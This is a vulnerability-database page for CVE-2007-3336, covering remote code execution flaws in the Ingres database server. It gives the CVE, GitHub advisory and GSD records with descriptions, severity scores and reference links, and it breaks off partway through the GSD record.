CVE-2007-3336 (GCVE-0-2007-3336)

Vulnerability from cvelistv5 – Published: 2007-06-22 18:00 – Updated: 2024-08-07 14:14

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

Tags

	http://www.vupen.com/english/advisories/2007/2288	vdb-entryx_refsource_VUPEN
	http://www.ca.com/us/securityadvisor/newsinfo/col…	x_refsource_CONFIRM
	http://secunia.com/advisories/25756	third-party-advisoryx_refsource_SECUNIA
	http://secunia.com/advisories/25775	third-party-advisoryx_refsource_SECUNIA
	http://www.vupen.com/english/advisories/2007/2290	vdb-entryx_refsource_VUPEN
	http://supportconnectw.ca.com/public/ca_common_do…	x_refsource_CONFIRM
	https://exchange.xforce.ibmcloud.com/vulnerabilit…	vdb-entryx_refsource_XF
	https://exchange.xforce.ibmcloud.com/vulnerabilit…	vdb-entryx_refsource_XF
	http://www.securityfocus.com/bid/24585	vdb-entryx_refsource_BID
	http://osvdb.org/37486	vdb-entryx_refsource_OSVDB
	http://archives.neohapsis.com/archives/bugtraq/20…	mailing-listx_refsource_BUGTRAQ
	http://www.securityfocus.com/archive/1/472193/100…	mailing-listx_refsource_BUGTRAQ
	http://www.ngssoftware.com/advisories/critical-ri…	x_refsource_MISC
	http://www.ngssoftware.com/advisories/critical-ri…	x_refsource_MISC

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T14:14:12.898Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2007-2288",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/2288"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
          },
          {
            "name": "25756",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/25756"
          },
          {
            "name": "25775",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/25775"
          },
          {
            "name": "ADV-2007-2290",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/2290"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
          },
          {
            "name": "ingres-unspecified-code-execution(34993)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
          },
          {
            "name": "ingres-pointer-code-execution(35000)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
          },
          {
            "name": "24585",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/24585"
          },
          {
            "name": "37486",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/37486"
          },
          {
            "name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
          },
          {
            "name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-06-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2007-2288",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/2288"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
        },
        {
          "name": "25756",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/25756"
        },
        {
          "name": "25775",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/25775"
        },
        {
          "name": "ADV-2007-2290",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/2290"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
        },
        {
          "name": "ingres-unspecified-code-execution(34993)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
        },
        {
          "name": "ingres-pointer-code-execution(35000)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
        },
        {
          "name": "24585",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/24585"
        },
        {
          "name": "37486",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/37486"
        },
        {
          "name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
        },
        {
          "name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-3336",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2007-2288",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/2288"
            },
            {
              "name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
              "refsource": "CONFIRM",
              "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
            },
            {
              "name": "25756",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/25756"
            },
            {
              "name": "25775",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/25775"
            },
            {
              "name": "ADV-2007-2290",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/2290"
            },
            {
              "name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
              "refsource": "CONFIRM",
              "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
            },
            {
              "name": "ingres-unspecified-code-execution(34993)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
            },
            {
              "name": "ingres-pointer-code-execution(35000)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
            },
            {
              "name": "24585",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/24585"
            },
            {
              "name": "37486",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/37486"
            },
            {
              "name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
              "refsource": "BUGTRAQ",
              "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
            },
            {
              "name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
            },
            {
              "name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/",
              "refsource": "MISC",
              "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
            },
            {
              "name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/",
              "refsource": "MISC",
              "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-3336",
    "datePublished": "2007-06-22T18:00:00",
    "dateReserved": "2007-06-21T00:00:00",
    "dateUpdated": "2024-08-07T14:14:12.898Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:ingres:database_server:2.5:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5D23E67C-E964-4571-B6FA-DCC910FD2A7C\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:ingres:database_server:2.6:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"D0D77591-A8B7-4BAE-9761-CEB5A739A9E1\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:ingres:database_server:9.0.4:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"DFE10403-BEB4-4A63-BC0D-CC5803584F5E\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:ingres:database_server:r3:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"01A77427-8C8D-4ABD-8502-F40D704B5F8A\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Multiple \\\"pointer overwrite\\\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input.\"}, {\"lang\": \"es\", \"value\": \"M\\u00faltiples vulnerabilidades \\\"pointer overwrite\\\" en  Ingres database server 2006 versiones 9.0.4, r3, 2.6 y 2.5, tal como se usa en varios productos de CA (anteriormente Computer Associates), permiten a los atacantes remotos ejecutar c\\u00f3digo arbitrario mediante el env\\u00edo de ciertos datos TCP en diferentes momentos hacia Ingres Communications Server Process (iigcc), que llama a las funciones (1) QUinsert o (2) QUremove con entrada controlada por el atacante.\"}]",
      "id": "CVE-2007-3336",
      "lastModified": "2024-11-21T00:32:59.103",
      "metrics": "{\"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:C/I:C/A:C\", \"baseScore\": 10.0, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"COMPLETE\", \"integrityImpact\": \"COMPLETE\", \"availabilityImpact\": \"COMPLETE\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 10.0, \"acInsufInfo\": false, \"obtainAllPrivilege\": true, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2007-06-22T18:30:00.000",
      "references": "[{\"url\": \"http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://osvdb.org/37486\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://secunia.com/advisories/25756\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://secunia.com/advisories/25775\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\", \"source\": \"cve@mitre.org\", \"tags\": [\"Patch\"]}, {\"url\": \"http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.securityfocus.com/archive/1/472193/100/0/threaded\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.securityfocus.com/bid/24585\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.vupen.com/english/advisories/2007/2288\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://www.vupen.com/english/advisories/2007/2290\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/34993\", \"source\": \"cve@mitre.org\"}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/35000\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://osvdb.org/37486\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://secunia.com/advisories/25756\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://secunia.com/advisories/25775\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.securityfocus.com/archive/1/472193/100/0/threaded\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.securityfocus.com/bid/24585\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.vupen.com/english/advisories/2007/2288\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://www.vupen.com/english/advisories/2007/2290\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/34993\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/35000\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"NVD-CWE-Other\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2007-3336\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2007-06-22T18:30:00.000\",\"lastModified\":\"2025-04-09T00:30:58.490\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Multiple \\\"pointer overwrite\\\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input.\"},{\"lang\":\"es\",\"value\":\"M\u00faltiples vulnerabilidades \\\"pointer overwrite\\\" en  Ingres database server 2006 versiones 9.0.4, r3, 2.6 y 2.5, tal como se usa en varios productos de CA (anteriormente Computer Associates), permiten a los atacantes remotos ejecutar c\u00f3digo arbitrario mediante el env\u00edo de ciertos datos TCP en diferentes momentos hacia Ingres Communications Server Process (iigcc), que llama a las funciones (1) QUinsert o (2) QUremove con entrada controlada por el atacante.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:C/I:C/A:C\",\"baseScore\":10.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":true,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-Other\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:ingres:database_server:2.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5D23E67C-E964-4571-B6FA-DCC910FD2A7C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:ingres:database_server:2.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D0D77591-A8B7-4BAE-9761-CEB5A739A9E1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:ingres:database_server:9.0.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DFE10403-BEB4-4A63-BC0D-CC5803584F5E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:ingres:database_server:r3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"01A77427-8C8D-4ABD-8502-F40D704B5F8A\"}]}]}],\"references\":[{\"url\":\"http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://osvdb.org/37486\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://secunia.com/advisories/25756\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://secunia.com/advisories/25775\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\",\"source\":\"cve@mitre.org\",\"tags\":[\"Patch\"]},{\"url\":\"http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.securityfocus.com/archive/1/472193/100/0/threaded\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.securityfocus.com/bid/24585\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.vupen.com/english/advisories/2007/2288\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.vupen.com/english/advisories/2007/2290\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/34993\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/35000\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://osvdb.org/37486\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/25756\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://secunia.com/advisories/25775\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/archive/1/472193/100/0/threaded\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/bid/24585\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.vupen.com/english/advisories/2007/2288\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.vupen.com/english/advisories/2007/2290\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/34993\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/35000\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

GHSA-Q782-HGFX-W6CC

Vulnerability from github – Published: 2022-05-01 18:12 – Updated: 2025-04-09 03:43

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2007-3336"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2007-06-22T18:30:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input.",
  "id": "GHSA-q782-hgfx-w6cc",
  "modified": "2025-04-09T03:43:03Z",
  "published": "2022-05-01T18:12:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-3336"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
    },
    {
      "type": "WEB",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/37486"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/25756"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/25775"
    },
    {
      "type": "WEB",
      "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
    },
    {
      "type": "WEB",
      "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
    },
    {
      "type": "WEB",
      "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1"
    },
    {
      "type": "WEB",
      "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/24585"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2007/2288"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2007/2290"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GSD-2007-3336

Vulnerability from gsd - Updated: 2023-12-13 01:21

Details

Aliases

CVE-2007-3336

Aliases

CVE-2007-3336

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2007-3336",
    "description": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input.",
    "id": "GSD-2007-3336",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2007-3336"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2007-3336"
      ],
      "details": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input.",
      "id": "GSD-2007-3336",
      "modified": "2023-12-13T01:21:41.939011Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2007-3336",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "ADV-2007-2288",
            "refsource": "VUPEN",
            "url": "http://www.vupen.com/english/advisories/2007/2288"
          },
